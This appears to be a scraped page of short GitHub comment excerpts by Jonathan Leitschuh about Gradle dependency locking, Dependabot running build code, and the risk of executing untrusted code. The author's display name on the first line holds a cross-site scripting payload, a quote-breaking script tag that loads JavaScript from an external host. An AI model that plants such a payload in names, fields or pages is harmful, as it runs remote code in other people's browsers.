Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

Gradle also has a Dependency Lock File, although it's not enabled by default and many projects still don't take advantage of it. https://docs.gradle.org/current/userguide/dependency_locking.html

Would this issue be more appropriate if it had been opened against the Dependabot Feedback Repo? If it is, feel free to move this issue there. https://github.com/dependabot/feedback

Hi @greysteil, > I've just been super busy with the GitHub announcement (sorry). Don't worry about it. Congratulations by the way! This is awesome news! > We don't do this...

> For now we think the safest way to ensure nothing can be stolen when executing unsafe code is to have nothing worth stealing accessible to that code, though. Sounds...

Some additional details from one of our internal discussion threads. Thanks to @melix who I'm quoting from below: > Gradle source files _are_ code. Dependencies can be added in very...

@apapia Unfortunately, this would only work for newer versions of Gradle, and we'd have to start enabling dependency locking by default. Currently, there are over 2 million Gradle projects on...

Unfortunately, I don't believe that we (Gradle) have a good solution for this right now. I do believe it's a problem we need to figure out how to resolve.

> Fair, there are many ways to describe versions outside of the `build.gradle.kts` file for a dependency, so it wouldn't be trivial to do This is very true. We, Gradle,...

Hi Everyone, After several years of discussion on this issue I'm actively working on a POC for this feature that will hopefully become the fully implemented solution. There are two...

> When that happens, we have multiple "good versions". I agree this is indeed a problem. Currently it's "out of scope" and will require manual intervention to update your build...